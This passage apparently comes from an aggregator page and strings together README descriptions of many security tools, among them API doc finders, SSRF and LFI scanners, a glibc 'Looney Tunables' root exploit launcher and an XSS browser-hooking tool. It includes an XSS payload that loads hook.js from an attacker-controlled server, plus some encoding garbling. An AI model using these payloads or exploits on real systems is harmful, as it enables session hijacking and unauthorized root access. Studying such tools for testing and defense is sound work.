python apidetector.py -m -d example.com
To run the script in quiet mode (suppress verbose output):
python apidetector.py -q -d example.com
To run the script with a custom user-agent:
python apidetector.py -d example.com -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36"
-d
, --domain
: Single domain to test.-i
, --input
: Input file containing subdomains to test.-o
, --output
: Output file to write valid URLs to.-t
, --threads
: Number of threads to use for scanning (default is 10).-m
, --mixed-mode
: Test both HTTP and HTTPS protocols.-q
, --quiet
: Disable verbose output (default mode is verbose).-ua
, --user-agent
: Custom User-Agent string for requests.Exposing Swagger or OpenAPI documentation endpoints can present various risks, primarily related to information disclosure. Here's an ordered list based on potential risk levels, with similar endpoints grouped together APIDetector scans:
'/swagger-ui.html'
, '/swagger-ui/'
, '/swagger-ui/index.html'
, '/api/swagger-ui.html'
, '/documentation/swagger-ui.html'
, '/swagger/index.html'
, '/api/docs'
, '/docs'
, '/api/swagger-ui'
, '/documentation/swagger-ui'
'/openapi.json'
, '/swagger.json'
, '/api/swagger.json'
, '/swagger.yaml'
, '/swagger.yml'
, '/api/swagger.yaml'
, '/api/swagger.yml'
, '/api.json'
, '/api.yaml'
, '/api.yml'
, '/documentation/swagger.json'
, '/documentation/swagger.yaml'
, '/documentation/swagger.yml'
'/v2/api-docs'
, '/v3/api-docs'
, '/api/v2/swagger.json'
, '/api/v3/swagger.json'
, '/api/v1/documentation'
, '/api/v2/documentation'
, '/api/v3/documentation'
, '/api/v1/api-docs'
, '/api/v2/api-docs'
, '/api/v3/api-docs'
, '/swagger/v2/api-docs'
, '/swagger/v3/api-docs'
, '/swagger-ui.html/v2/api-docs'
, '/swagger-ui.html/v3/api-docs'
, '/api/swagger/v2/api-docs'
, '/api/swagger/v3/api-docs'
'/swagger-resources'
, '/swagger-resources/configuration/ui'
, '/swagger-resources/configuration/security'
, '/api/swagger-resources'
, '/api.html'
Contributions to APIDetector are welcome! Feel free to fork the repository, make changes, and submit pull requests.
The use of APIDetector should be limited to testing and educational purposes only. The developers of APIDetector assume no liability and are not responsible for any misuse or damage caused by this tool. It is the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no responsibility for unauthorized or illegal use of this tool. Before using APIDetector, ensure you have permission to test the network or systems you intend to scan.
This project is licensed under the MIT License.
Service that scans your Infrastructure as Code for common vulnerabilities.
Aspect | Information |
---|---|
Tool name | IaC Scan Runner |
Docker image | xscanner/runner |
PyPI package | iac-scan-runner |
Documentation | docs |
Contact us | xopera@xlab.si |
The IaC Scan Runner is a REST API service used to scan IaC (Infrastructure as Code) package and perform various code checks in order to find possible vulnerabilities and improvements. Explore the docs for more info.
This section explains how to run the REST API.
You can run the REST API using a public xscanner/runner Docker image as follows:
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 xscanner/runner
Or you can build the image locally and run it as follows:
# build Docker container (it will take some time)
$ docker build -t iac-scan-runner .
# run IaC Scan Runner REST API in a Docker container and
# navigate to localhost:8080/swagger or localhost:8080/redoc
$ docker run --name iac-scan-runner -p 8080:80 iac-scan-runner
To run using the IaC Scan Runner CLI:
# install the CLI
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install iac-scan-runner
# print OpenAPI specification
(.venv) $ iac-scan-runner openapi
# install prerequisites
(.venv) $ iac-scan-runner install
# run IaC Scan Runner REST API
(.venv) $ iac-scan-runner run
To run locally from source:
# Export env variables
export MONGODB_CONNECTION_STRING=mongodb://localhost:27017
export SCAN_PERSISTENCE=enabled
export USER_MANAGEMENT=enabled
# Setup MongoDB
$ docker run --name mongodb -p 27017:27017 mongo
# install prerequisites
$ python3 -m venv .venv && . .venv/bin/activate
(.venv) $ pip install -r requirements.txt
(.venv) $ ./install-checks.sh
# run IaC Scan Runner REST API (add --reload flag to apply code changes on the way)
(.venv) $ uvicorn src.iac_scan_runner.api:app
This part will show one of the possible deployments and short examples on how to use API calls.
Firstly we will clone the iac scan runner repository and run the API.
$ git clone https://github.com/xlab-si/iac-scan-runner.git
$ docker compose up
After this is done you can use different API endpoints by calling localhost:8000. You can also navigate to localhost:8000/swagger or localhost:8000/redoc and test all the API endpoints there. In this example, we will use curl for calling API endpoints.
curl -X 'POST' \
'http://0.0.0.0/project?creator_id=test' \
-H 'accept: application/json' \
-d ''
project id will be returned to us. For this example project id is 1e7b2a91-2896-40fd-8d53-83db56088026.
curl -X 'PUT' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/checks/ansible-lint/disable' \
-H 'accept: application/json'
curl -X 'POST' \
'http://0.0.0.0:8000/projects/1e7b2a91-2896-40fd-8d53-83db56088026/scan?scan_response_type=json' \
-H 'accept: application/json' \
-H 'Content-Type: multipart/form-data' \
-F 'iac=@YOUR.zip;type=application/zip'
That is it.
At certain point, it might be required to include new check tools within the scan workflow, with aim to provide wider coverage of IaC standards and project types. Therefore, in this subsection, a sequence of required steps for that purpose is identified and described. However, the steps have to be performed manually as it will be described, but it is planned to automatize this procedure in future via API and provide user-friendly interface that will aid the user while importing new tools that will become part of the available catalogue that makes the scan workflow. Figure 16 depicts the required steps which have to be taken in order to extend the scan workflow with a new tool.
Step 1 β Adding tool-specific class to checks directory First, it is required to add a new tool-specific Python class to the checks directory inside IaC Scan Runnerβs source code: iac-scan-runner/src/iac_scan_runner/checks/new_tool.py
The class of a new tool inherits the existing Check class, which provides generalization of scan workflow tools. Moreover, it is necessary to provide implementation of the following methods:
Step 2 β Adding the check tool class instance within ScanRunner constructor Once the new class derived from Check is added to the IaC Scan Runnerβs source code, it is also required to modify the source code of its main class, called ScanRunner. When it comes to modifications of this class, it is required first to import the tool-specific class, create a new check tool-specific class instance and adding it to the dictionary of IaC checks inside def init_checks(self). A. Importing the check tool class from iac_scan_runner.checks.tfsec import TfsecCheck B. Creating new instance of check tool object inside init_checks """Initiate predefined check objects""" new_tool = NewToolCheck() C. Adding it to self.iac_checks dictionary inside init_checks
self.iac_checks = {
new_tool.name: new_tool,
β¦
}
Step 3 β Adding the check tool to the compatibility matrix inside Compatibility class On the other side, inside file src/iac_scan_runner/compatibility.py, the dictionary which represents compatibility matrix should be extended as well. There are two possible cases: a) new file type should be added as a key, together with list of relevant tools as value b) new tool should be added to the compatibility list for the existing file type.
compatibility_matrix = {
"new_type": ["new_tool_1", "new_tool_2"],
β¦
"old_typeK": ["tool_1", β¦ "tool_N", "new_tool_3"]
}
Step 4 β Providing the support for result summarization Finally, the last step in sequence of required modifications for scan workflow extension is to modify class ResultsSummary (src/iac_scan_runner/results_summary.py). Precisely, it is required to append a part of the code to its method summarize_outcome that will look for specific strings which are tool-specific and can be used to identify whether the check passed or failed. Inside the loop that traverses the compatible checks, for each new tool the following structure of if-else should be included:
if check == "new_tool":
if outcome.find("Check pass string") > -1:
self.outcomes[check]["status"] = "Passed"
return "Passed"
else:
self.outcomes[check]["status"] = "Problems"
return "Problems"
You can contact the xOpera team by sending an email to xopera@xlab.si.
This project has received funding from the European Unionβs Horizon 2020 research and innovation programme under Grant Agreement No. 101000162 (PIACERE).
A cutting-edge utility designed exclusively for web security aficionados, penetration testers, and system administrators. WebSecProbe is your advanced toolkit for conducting intricate web security assessments with precision and depth. This robust tool streamlines the intricate process of scrutinizing web servers and applications, allowing you to delve into the technical nuances of web security and fortify your digital assets effectively.
WebSecProbe is designed to perform a series of HTTP requests to a target URL with various payloads in order to test for potential security vulnerabilities or misconfigurations. Here's a brief overview of what the code does:
Does This Tool Bypass 403 ?
It doesn't directly attempt to bypass a 403 Forbidden status code. The code's purpose is more about testing the behavior of the server when different requests are made, including requests with various payloads, headers, and URL variations. While some of the payloads and headers in the code might be used in certain scenarios to test for potential security misconfigurations or weaknesses, it doesn't guarantee that it will bypass a 403 Forbidden status code.
In summary, this code is a tool for exploring and analyzing a web server's responses to different requests, but whether or not it can bypass a 403 Forbidden status code depends on the specific configuration and security measures implemented by the target server.
Β
pip install WebSecProbe
WebSecProbe <URL> <Path>
Example:
WebSecProbe https://example.com admin-login
from WebSecProbe.main import WebSecProbe
if __name__ == "__main__":
url = 'https://example.com' # Replace with your target URL
path = 'admin-login' # Replace with your desired path
probe = WebSecProbe(url, path)
probe.run()
Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.
LooneyPwner is a proof-of-concept (PoC) exploit tool targeting the critical buffer overflow vulnerability, nicknamed "Looney Tunables," found in the GNU C Library (glibc). This flaw, officially tracked as CVE-2023-4911, is present in various Linux distributions, posing significant risks, including unauthorized data access and system alterations.
The vulnerability in the GNU C Library (glibc) was disclosed last week, with notable security researchers and analysts releasing PoC exploits, indicating the potential for widespread attacks. The flaw, discovered by Qualys researchers, can grant attackers root privileges on various Linux distributions including Fedora, Ubuntu, and Debian.
Unauthorized root access provides attackers unrestricted authority, enabling them to:
LooneyPwner exploits the "Looney Tunables" flaw, targeting affected glibc versions. The tool:
chmod +x looneypwner.sh
./looneypwner.sh
This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.
This exploit code is based on the work of leesh3288. A big thanks to him for the foundational work on the exploit.
Web Path Finder is a Python program that provides information about a website. It retrieves various details such as page title, last updated date, DNS information, subdomains, firewall names, technologies used, certificate information, and more.Β
Clone the repository:
git clone https://github.com/HalilDeniz/PathFinder.git
Install the required packages:
pip install -r requirements.txt
This will install all the required modules and their respective versions.
Run the program using the following command:
Γ’βΕΓ’ββ¬Γ’ββ¬(rootΓ°ΕΈββ¬denizhalil)-[~/MyProjects/]
Γ’ββΓ’ββ¬# python3 web-info-explorer.py --help
usage: wpathFinder.py [-h] url
Web Information Program
positional arguments:
url Enter the site URL
options:
-h, --help show this help message and exit
Replace <url>
with the URL of the website you want to explore.
Here is an example output of running the program:
Γ’βΕΓ’ββ¬Γ’ββ¬(rootΓ°ΕΈββ¬denizhalil)-[~/MyProjects/]
Γ’ββΓ’ββ¬# python3 pathFinder.py https://www.facebook.com/
Site Information:
Title: Facebook - Login or Register
Last Updated Date: None
First Creation Date: 1997-03-29 05:00:00
Dns Information: []
Sub Branches: ['157']
Firewall Names: []
Technologies Used: javascript, php, css, html, react
Certificate Information:
Certificate Issuer: US
Certificate Start Date: 2023-02-07 00:00:00
Certificate Expiration Date: 2023-05-08 23:59:59
Certificate Validity Period (Days): 90
Bypassed JavaScript content:
</ div> Contributions are welcome! To contribute to PathFinder, follow these steps:
This project is licensed under the MIT License - see the LICENSE file for details.
For any inquiries or further information, you can reach me through the following channels:
Sirius is the first truly open-source general purpose vulnerability scanner. Today, the information security community remains the best and most expedient source for cybersecurity intelligence. The community itself regularly outperforms commercial vendors. This is the primary advantage Sirius Scan intends to leverage.
The framework is built around four general vulnerability identification concepts: The vulnerability database, network vulnerability scanning, agent-based discovery, and custom assessor analysis. With these powers combined around an easy to use interface Sirius hopes to enable industry evolution.
To run Sirius clone this repository and invoke the containers with docker-compose
. Note that both docker
and docker-compose
must be installed to do this.
git clone https://github.com/SiriusScan/Sirius.git
cd Sirius
docker-compose up
The default username and password for Sirius is: admin/sirius
The system is composed of the following services:
To use Sirius, first start all of the services by running docker-compose up
. Then, access the web UI at localhost:5173
.
If you would like to setup Sirius Scan on a remote machine and access it you must modify the ./UI/config.json
file to include your server details.
Good Luck! Have Fun! Happy Hacking!
Daksh SCRA (Source Code Review Assist) tool is built to enhance the efficiency of the source code review process, providing a well-structured and organized approach for code reviewers.
Rather than indiscriminately flagging everything as a potential issue, Daksh SCRA promotes thoughtful analysis, urging the investigation and confirmation of potential problems. This approach mitigates the scramble to tag every potential concern as a bug, cutting back on the confusion and wasted time spent on false positives.
What sets Daksh SCRA apart is its emphasis on avoiding unnecessary bug tagging. Unlike conventional methods, it advocates for thorough investigation and confirmation of potential issues before tagging them as bugs. This approach helps mitigate the issue of false positives, which often consume valuable time and resources, thereby fostering a more productive and efficient code review process.
Daksh SCRA was initially introduced during a source code review training session I conducted at Black Hat USA 2022 (August 6 - 9), where it was subtly presented to a specific audience. However, this introduction was carried out with a low-profile approach, avoiding any major announcements.
While this tool was quietly published on GitHub after the 2022 training, its official public debut took place at Black Hat USA 2023 in Las Vegas.
Identifies Areas of Interest in Source Code: Encourage focused investigation and confirmation rather than indiscriminately labeling everything as a bug.
Identifies Areas of Interest in File Paths (Worldβs First): Recognises patterns in file paths to pinpoint relevant sections for review.
Software-Level Reconnaissance to Identify Technologies Utilised: Identifies project technologies, enabling code reviewers to conduct precise scans with appropriate rules.
Automated Scientific Effort Estimation for Code Review (Worldβs First): Providing a measurable approach for estimating efforts required for a code review process.
Although this tool has progressed beyond its early stages, it has reached a functional state that is quite usable and delivers on its promised capabilities. Nevertheless, active enhancements are currently underway, and there are multiple new features and improvements expected to be added in the upcoming months.
Additionally, the tool offers the following functionalities:
Refer to the wiki for the tool setup and usage details - https://github.com/coffeeandsecurity/DakshSCRA/wiki
Feel free to contribute towards updating or adding new rules and future development.
If you find any bugs, report them to d3basis.m0hanty@gmail.com.
Python3 and all the libraries listed in requirements.txt
$ pip install virtualenv
$ virtualenv -p python3 {name-of-virtual-env} // Create a virtualenv
Example: virtualenv -p python3 venv
$ source {name-of-virtual-env}/bin/activate // To activate virtual environment you just created
Example: source venv/bin/activate
After running the activate command you should see the name of your virtual env at the beginning of your terminal like this: (venv) $
You must run the below command after activating the virtual environment as mentioned in the previous steps.
pip install -r requirements.txt
Once the above step successfully installs all the required libraries, refer to the following tool usage commands to run the tool.
$ python3 dakshscra.py -h // To view avaialble options and arguments
usage: dakshscra.py [-h] [-r RULE_FILE] [-f FILE_TYPES] [-v] [-t TARGET_DIR] [-l {R,RF}] [-recon] [-estimate]
options:
-h, --help show this help message and exit
-r RULE_FILE Specify platform specific rule name
-f FILE_TYPES Specify file types to scan
-v Specify verbosity level {'-v', '-vv', '-vvv'}
-t TARGET_DIR Specify target directory path
-l {R,RF}, --list {R,RF}
List rules [R] OR rules and filetypes [RF]
-recon Detects platform, framework and programming language used
-estimate Estimate efforts required for code review
$ python3 dakshscra.py // To view tool usage along with examples
Examples:
# '-f' is optional. If not specified, it will default to the corresponding filetypes of the selected rule.
dakshsca.py -r php -t /source_dir_path
# To override default settings, other filetypes can be specified with '-f' option.
dakshsca.py -r php -f dotnet -t /path_to_source_dir
dakshsca.py -r php -f custom -t /path_to_source_dir
# Perform reconnaissance and rule based scanning if '-recon' used with '-r' option.
dakshsca.py -recon -r php -t /path_to_source_dir
# Perform only reconnaissance if '-recon' used without the '-r' option.
dakshsca.py -recon -t /path_to_source_dir
# Verbosity: '-v' is default, '-vvv' will display all rules check within each rule category.
dakshsca.py -r php -vv -t /path_to_source_dir
Supported RULE_FILE: dotnet, java, php, javascript
Supported FILE_TY PES: dotnet, php, java, custom, allfiles
The tool generates reports in three formats: HTML, PDF, and TEXT. Although the HTML and PDF reports are still being improved, they are currently in a reasonably good state. With each subsequent iteration, these reports will continue to be refined and improved even further.
Note: Currently, the reconnaissance report is created in a text format. However, in upcoming releases, the plan is to incorporate it into the vulnerability scanning report, which will be available in both HTML and PDF formats.
Note: At present, the effort estimation for the source code review is in its early stages. It is considered experimental and will be developed and refined through several iterations. Improvements will be made over multiple releases, as the formula and the concept are new and require time to be honed to achieve accuracy or reasonable estimation.
Currently, the report is generated in HTML format. However, in future releases, there are plans to also provide it in PDF format.
Callisto is an intelligent automated binary vulnerability analysis tool. Its purpose is to autonomously decompile a provided binary and iterate through the psuedo code output looking for potential security vulnerabilities in that pseudo c code. Ghidra's headless decompiler is what drives the binary decompilation and analysis portion. The pseudo code analysis is initially performed by the Semgrep SAST tool and then transferred to GPT-3.5-Turbo for validation of Semgrep's findings, as well as potential identification of additional vulnerabilities.
This tool's intended purpose is to assist with binary analysis and zero-day vulnerability discovery. The output aims to help the researcher identify potential areas of interest or vulnerable components in the binary, which can be followed up with dynamic testing for validation and exploitation. It certainly won't catch everything, but the double validation with Semgrep to GPT-3.5 aims to reduce false positives and allow a deeper analysis of the program.
For those looking to just leverage the tool as a quick headless decompiler, the output.c
file created will contain all the extracted pseudo code from the binary. This can be plugged into your own SAST tools or manually analyzed.
I owe Marco Ivaldi @0xdea a huge thanks for his publicly released custom Semgrep C rules as well as his idea to automate vulnerability discovery using semgrep and pseudo code output from decompilers. You can read more about his research here: Automating binary vulnerability discovery with Ghidra and Semgrep
Requirements:
pip install semgrep
pip install -r requirements.txt
config.txt
fileTo Run: python callisto.py -b <path_to_binary> -ai -o <path_to_output_file>
-ai
=> enable OpenAI GPT-3.5-Turbo Analysis. Will require placing a valid OpenAI API key in the config.txt file-o
=> define an output file, if you want to save the output-ai
and -o
are optional parameters-all
will run all functions through OpenAI Analysis, regardless of any Semgrep findings. This flag requires the prerequisite -ai
flagpython callisto.py -b vulnProgram.exe -ai -o results.txt
python callisto.py -b vulnProgram.exe -ai -all -o results.txt
Program Output Example:
surf
allows you to filter a list of hosts, returning a list of viable SSRF candidates. It does this by sending a HTTP request from your machine to each host, collecting all the hosts that did not respond, and then filtering them into a list of externally facing and internally facing hosts.
You can then attempt these hosts wherever an SSRF vulnerability may be present. Due to most SSRF filters only focusing on internal or restricted IP ranges, you'll be pleasantly surprised when you get SSRF on an external IP that is not accessible via HTTP(s) from your machine.
Often you will find that large companies with cloud environments will have external IPs for internal web apps. Traditional SSRF filters will not capture this unless these hosts are specifically added to a blacklist (which they usually never are). This is why this technique can be so powerful.
This tool requires go 1.19 or above as we rely on httpx to do the HTTP probing.
It can be installed with the following command:
go install github.com/assetnote/surf/cmd/surf@latest
Consider that you have subdomains for bigcorp.com
inside a file named bigcorp.txt
, and you want to find all the SSRF candidates for these subdomains. Here are some examples:
# find all ssrf candidates (including external IP addresses via HTTP probing)
surf -l bigcorp.txt
# find all ssrf candidates (including external IP addresses via HTTP probing) with timeout and concurrency settings
surf -l bigcorp.txt -t 10 -c 200
# find all ssrf candidates (including external IP addresses via HTTP probing), and just print all hosts
surf -l bigcorp.txt -d
# find all hosts that point to an internal/private IP address (no HTTP probing)
surf -l bigcorp.txt -x
The full list of settings can be found below:
β― surf -h
βββββββββββ ββββββββββ ββββββββ
βββββββββββ βββββββββββββββββββ
βββββββββββ βββββββββββββββββ
βββββββββββ βββββββββββββββββ
ββββββββββββββββ βββ ββββββ
ββββββββ βββββββ βββ ββββββ
by shubs @ assetnote
Usage: surf [--hosts FILE] [--concurrency CONCURRENCY] [--timeout SECONDS] [--retries RETRIES] [--disablehttpx] [--disableanalysis]
Options:
--hosts FILE, -l FILE
List of assets (hosts or subdomains)
--concurrency CONCURRENCY, -c CONCURRENCY
Threads (passed down to httpx) - default 100 [default: 100]
--timeout SECONDS, -t SECONDS
Timeout in seconds (passed down to httpx) - default 3 [default: 3]
--retries RETRIES, -r RETRIES
Retries on failure (passed down to httpx) - default 2 [default: 2]
--disablehttpx, -x Disable httpx and only output list of hosts that resolve to an internal IP address - default false [default: false]
--disableanalysis, -d
Disable analysis and only output list of hosts - default false [default: false]
--help, -h display this help and exit
When running surf
, it will print out the SSRF candidates to stdout
, but it will also save two files inside the folder it is ran from:
external-{timestamp}.txt
- Externally resolving, but unable to send HTTP requests to from your machineinternal-{timestamp}.txt
- Internally resolving, and obviously unable to send HTTP requests from your machineThese two files will contain the list of hosts that are ideal SSRF candidates to try on your target. The external target list has higher chances of being viable than the internal list.
Under the hood, this tool leverages httpx to do the HTTP probing. It captures errors returned from httpx, and then performs some basic analysis to determine the most viable candidates for SSRF.
This tool was created as a result of a live hacking event for HackerOne (H1-4420 2023).
Welcome to HackBot, an AI-powered cybersecurity chatbot designed to provide helpful and accurate answers to your cybersecurity-related queries and also do code analysis and scan analysis. Whether you are a security researcher, an ethical hacker, or just curious about cybersecurity, HackBot is here to assist you in finding the information you need.
HackBot utilizes the powerful language model Meta-LLama2 through the "LlamaCpp" library. This allows HackBot to respond to your questions in a coherent and relevant manner. Please make sure to keep your queries in English and adhere to the guidelines provided to get the best results from HackBot.
Before you proceed with the installation, ensure you have the following prerequisites:
pip
package managerVisual studio Code
- Follow the steps in this link llama-cpp-prereq-install-instructions
cmake
git clone https://github.com/morpheuslord/hackbot.git
cd hackbot
pip install -r requirements.txt
python hackbot.py
The first time you run HackBot, it will check for the AI model required for the chatbot. If the model is not present, it will be automatically downloaded and saved as "llama-2-7b-chat.ggmlv3.q4_0.bin" in the project directory.
To start a conversation with HackBot, run the following command:
python hackbot.py
HackBot will display a banner and wait for your input. You can ask cybersecurity-related questions, and HackBot will respond with informative answers. To exit the chat, simply type "quit_bot" in the input prompt.
Here are some additional commands you can use:
clear_screen
: Clears the console screen for better readability.quit_bot
: This is used to quit the chat applicationbot_banner
: Prints the default bots banner.contact_dev
: Provides my contact information.save_chat
: Saves the current sessions interactions.vuln_analysis
: Does a Vuln analysis using the scan data or log file.static_code_analysis
: Does a Static code analysis using the scan data or log file.Note: I am working on more addons and more such commands to give a more chatGPT experience
Please Note: HackBot's responses are based on the Meta-LLama2 AI model, and its accuracy depends on the quality of the queries and data provided to it.
I am also working on AI training by which I can teach it how to be more accurately tuned to work for hackers on a much more professional level.
We welcome contributions to improve HackBot's functionality and accuracy. If you encounter any issues or have suggestions for enhancements, please feel free to open an issue or submit a pull request. Follow these steps to contribute:
main
branch of this repository.Please maintain a clean commit history and adhere to the project's coding guidelines.
If anyone with the know-how of training text generation models can help improve the code.
For any questions, feedback, or inquiries related to HackBot, feel free to contact the project maintainer:
Instagram: TMRSWRR
LFI-FINDER is an open-source tool available on GitHub that focuses on detecting Local File Inclusion (LFI) vulnerabilities. Local File Inclusion is a common security vulnerability that allows an attacker to include files from a web server into the output of a web application. This tool automates the process of identifying LFI vulnerabilities by analyzing URLs and searching for specific patterns indicative of LFI. It can be a useful addition to a security professional's toolkit for detecting and addressing LFI vulnerabilities in web applications.
This tool works with geckodriver, search url for LFI Vuln and when get an root text on the screen, it notifies you of the successful payload.
git clone https://github.com/capture0x/LFI-FINDER/
cd LFI-FINDER
bash setup.sh
pip3 install -r requirements.txt
chmod -R 755 lfi.py
python3 lfi.py
THIS IS FOR LATEST GOOGLE CHROME VERSION
For bug reports or enhancements, please open an issue here.
Copyright 2023
A tools for Find APK Infrastructure .
HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.
pip install -r requirements.txt
python main.py
--help Display help
--path Required path of apk file
--manifest Display manifest informations
--infra Find all infra addresses included ip,domain ex. --infra ip,domain
--whoise Whoise all infra included ip,domain ex. --whoise ip,domain
--output Set output files ex. --output out.txt
Example Usage:
1.Find infra(domain and ip) in sample4.apk and set output result into out.txt
python3 main.py --path sample4.apk --infra domain,ip --output out.txt
python3 main.py --path sample.apk --whois ip
A modular web reconnaissance tool and vulnerability scanner based on Karton (https://github.com/CERT-Polska/karton).
The Artemis project has been initiated by the KN Cyber science club of Warsaw University of Technology and is currently being maintained by CERT Polska.
Artemis is experimental software, under active development - use at your own risk.
For an up-to-date list of features, please refer to the documentation.
To run the tests, use:
./scripts/test
Artemis uses pre-commit
to run linters and format the code. pre-commit
is executed on CI to verify that the code is formatted properly.
To run it locally, use:
pre-commit run --all-files
To setup pre-commit
so that it runs before each commit, use:
pre-commit install
To build the documentation, use:
cd docs
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt
make html
Please refer to the documentation.
Contributions are welcome! We will appreciate both ideas for new Artemis modules (added as GitHub issues) as well as pull requests with new modules or code improvements.
However obvious it may seem we kindly remind you that by contributing to Artemis you agree that the BSD 3-Clause License shall apply to your input automatically, without the need for any additional declarations to be made.
Serial No. | Tool Name | Serial No. | Tool Name | |
---|---|---|---|---|
1 | whatweb | 2 | nmap | |
3 | golismero | 4 | host | |
5 | wget | 6 | uniscan | |
7 | wafw00f | 8 | dirb | |
9 | davtest | 10 | theharvester | |
11 | xsser | 12 | fierce | |
13 | dnswalk | 14 | dnsrecon | |
15 | dnsenum | 16 | dnsmap | |
17 | dmitry | 18 | nikto | |
19 | whois | 20 | lbd | |
21 | wapiti | 22 | devtest | |
23 | sslyze |
Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.
High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attackerβs control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.
Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerβs control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.
Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attackerβs control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.
Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.
CVSS V3 SCORE RANGE SEVERITY IN ADVISORY 0.1 - 3.9 Low 4.0 - 6.9 Medium 7.0 - 8.9 High 9.0 - 10.0 Critical
Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. | Vulnerabilities to Scan | Serial No. | Vulnerabilities to Scan | |
---|---|---|---|---|
1 | IPv6 | 2 | Wordpress | |
3 | SiteMap/Robot.txt | 4 | Firewall | |
5 | Slowloris Denial of Service | 6 | HEARTBLEED | |
7 | POODLE | 8 | OpenSSL CCS Injection | |
9 | FREAK | 10 | Firewall | |
11 | LOGJAM | 12 | FTP Service | |
13 | STUXNET | 14 | Telnet Service | |
15 | LOG4j | 16 | Stress Tests | |
17 | WebDAV | 18 | LFI, RFI or RCE. | |
19 | XSS, SQLi, BSQL | 20 | XSS Header not present | |
21 | Shellshock Bug | 22 | Leaks Internal IP | |
23 | HTTP PUT DEL Methods | 24 | MS10-070 | |
25 | Outdated | 26 | CGI Directories | |
27 | Interesting Files | 28 | Injectable Paths | |
29 | Subdomains | 30 | MS-SQL DB Service | |
31 | ORACLE DB Service | 32 | MySQL DB Service | |
33 | RDP Server over UDP and TCP | 34 | SNMP Service | |
35 | Elmah | 36 | SMB Ports over TCP and UDP | |
37 | IIS WebDAV | 38 | X-XSS Protection |
git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt
Template contributions , Feature Requests and Bug Reports are more than welcome.
Contributions, issues and feature requests are welcome!
Feel free to check issues page.
XSS Exploitation Tool is a penetration testing tool that focuses on the exploit of Cross-Site Scripting vulnerabilities.
This tool is only for educational purpose, do not use it against real environment
Tested on Debian 11
You may need Apache, Mysql database and PHP with modules:
$ sudo apt-get install apache2 default-mysql-server php php-mysql php-curl php-dom
$ sudo rm /var/www/index.html
Install Git and pull the XSS-Exploitation-Tool source code:
$ sudo apt-get install git
$ cd /tmp
$ git clone https://github.com/Sharpforce/XSS-Exploitation-Tool.git
$ sudo mv XSS-Exploitation-Tool/* /var/www/html/
Install composer, then install the application dependencies:
$ sudo apt-get install composer
$ cd /var/www/html/
$ sudo chown -R $your_debian_user:$your_debian_user /var/www/
$ composer install
$ sudo chown -R www-data:$www-data /var/www/
$ sudo mysql
Creating a new user with specific rights:
MariaDB [(none)]> grant all on *.* to xet@localhost identified by 'xet';
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.00 sec)
MariaDB [(none)]> quit
Bye
Creating the database (will result in an empty page):
Visit the page http://server-ip/reset_database.php
The file hook.js is a hook. You need to replace the ip address in the first line with the XSS Exploitation Tool server ip address:
var address = "your server ip";
First, create a page (or exploit a Cross-Site Scripting vulnerability) to insert the Javascript hook file (see exploit.html at the root dir):
?vulnerable_param=<script src="http://your_server_ip/hook.js"/>
Then, when victims visit the hooked page, the XSS Exploitation Tool server should list the hooked browsers:
All in one tools for LFI VULN FINDER -LFI DORK FINDER
Instagram: TMRSWRR
LFI Space is a robust and efficient tool designed to detect Local File Inclusion (LFI) vulnerabilities in web applications. This tool simplifies the process of identifying potential security flaws by leveraging two distinct scanning methods: Google Dork Search and Targeted URL Scan. With its comprehensive approach, LFI Space assists security professionals, penetration testers, and ethical hackers in assessing the security posture of web applications.
The Google Dork Search functionality within LFI Space harnesses the power of the Google search engine to identify web pages that may be susceptible to LFI attacks. By employing carefully crafted Google dorks, the tool retrieves search results that are likely to contain vulnerable pages. These dorks are specific queries designed to target common LFI vulnerability patterns in web applications. LFI Space then analyzes the responses from these pages, meticulously examining the content to identify any signs of LFI vulnerabilities. This approach allows for a broad and automated search, rapidly surfacing potential targets for further investigation.
Additionally, LFI Space provides a Targeted URL Scan feature, enabling users to manually input a list of specific URLs for scanning. This functionality allows for a more focused approach, enabling security professionals to assess particular web applications or pages of interest. By scanning each URL individually, LFI Space thoroughly inspects the target web pages for any signs of LFI vulnerabilities. This targeted approach provides flexibility and precision in identifying potential security weaknesses.
